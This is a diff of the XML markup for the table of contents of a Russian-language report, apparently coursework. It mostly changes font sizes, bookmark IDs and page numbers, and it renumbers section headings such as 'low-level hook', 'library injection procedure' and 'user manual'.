                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712304 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752645 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1070,8 +1000,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>4</w:t>
             </w:r>
@@ -1079,8 +1007,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1093,29 +1019,26 @@
               <w:tab w:val="left" w:pos="480"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712305" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752646" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1123,9 +1046,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>СИСТЕМНОЕ ПРОЕКТИРОВАНИЕ</w:t>
             </w:r>
@@ -1133,8 +1053,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1142,8 +1060,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1151,25 +1067,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712305 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752646 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1177,8 +1087,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>7</w:t>
             </w:r>
@@ -1186,8 +1094,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1200,29 +1106,24 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712306" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752647" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>3.1 Способ взаимодействия пользователя и программы.</w:t>
+              </w:rPr>
+              <w:t>2.1 Способ взаимодействия пользователя и программы.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1230,8 +1131,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1239,25 +1138,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712306 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752647 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1265,8 +1158,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>7</w:t>
             </w:r>
@@ -1274,8 +1165,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1288,29 +1177,24 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712307" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752648" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>3.2 Структурная схема программы</w:t>
+              </w:rPr>
+              <w:t>2.2 Структурная схема программы</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1318,8 +1202,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1327,25 +1209,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712307 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752648 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1353,8 +1229,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>7</w:t>
             </w:r>
@@ -1362,8 +1236,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1376,29 +1248,26 @@
               <w:tab w:val="left" w:pos="480"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712308" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752649" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>3.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1406,9 +1275,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>ФУНКЦИОНАЛЬНОЕ ПРОЕКТИРОВАНИЕ</w:t>
             </w:r>
@@ -1416,8 +1282,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1425,8 +1289,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1434,25 +1296,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712308 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752649 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1460,17 +1316,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>8</w:t>
+              </w:rPr>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1483,29 +1335,24 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712309" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752650" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>4.1 Низкоуровневый хук</w:t>
+              </w:rPr>
+              <w:t>3.1 Низкоуровневый хук</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1513,8 +1360,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1522,25 +1367,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712309 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752650 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1548,17 +1387,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>8</w:t>
+              </w:rPr>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1571,29 +1406,24 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712310" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752651" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>4.2 Процедура установки программы</w:t>
+              </w:rPr>
+              <w:t>3.2 Процедура установки программы</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1601,8 +1431,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1610,25 +1438,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712310 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752651 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1636,17 +1458,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>9</w:t>
+              </w:rPr>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1659,29 +1477,24 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712311" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752652" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>4.3 Процедура инжекции библиотеки</w:t>
+              </w:rPr>
+              <w:t>3.3 Процедура инжекции библиотеки</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1689,8 +1502,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1698,25 +1509,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712311 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752652 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1724,17 +1529,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>9</w:t>
+              </w:rPr>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1747,29 +1548,24 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712312" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752653" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>4.4 Процедура получения снимка процессов</w:t>
+              </w:rPr>
+              <w:t>3.4 Процедура получения снимка процессов</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1777,8 +1573,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1786,25 +1580,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712312 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752653 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1812,8 +1600,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>10</w:t>
             </w:r>
@@ -1821,8 +1607,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1835,29 +1619,26 @@
               <w:tab w:val="left" w:pos="480"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712313" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752654" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>4.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1865,9 +1646,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>РУКОВОДСТВО ПОЛЬЗОВАТЕЛЯ</w:t>
             </w:r>
@@ -1875,8 +1653,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1884,8 +1660,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1893,25 +1667,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712313 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752654 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -1919,21 +1687,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>11</w:t>
+              </w:rPr>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
+          <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+          <w:bookmarkEnd w:id="0"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1942,29 +1708,26 @@
               <w:tab w:val="left" w:pos="480"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712314" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752655" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>5.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1972,9 +1735,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>ТЕСТИРОВНИЕ ПРОГРАММЫ</w:t>
             </w:r>
@@ -1982,8 +1742,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
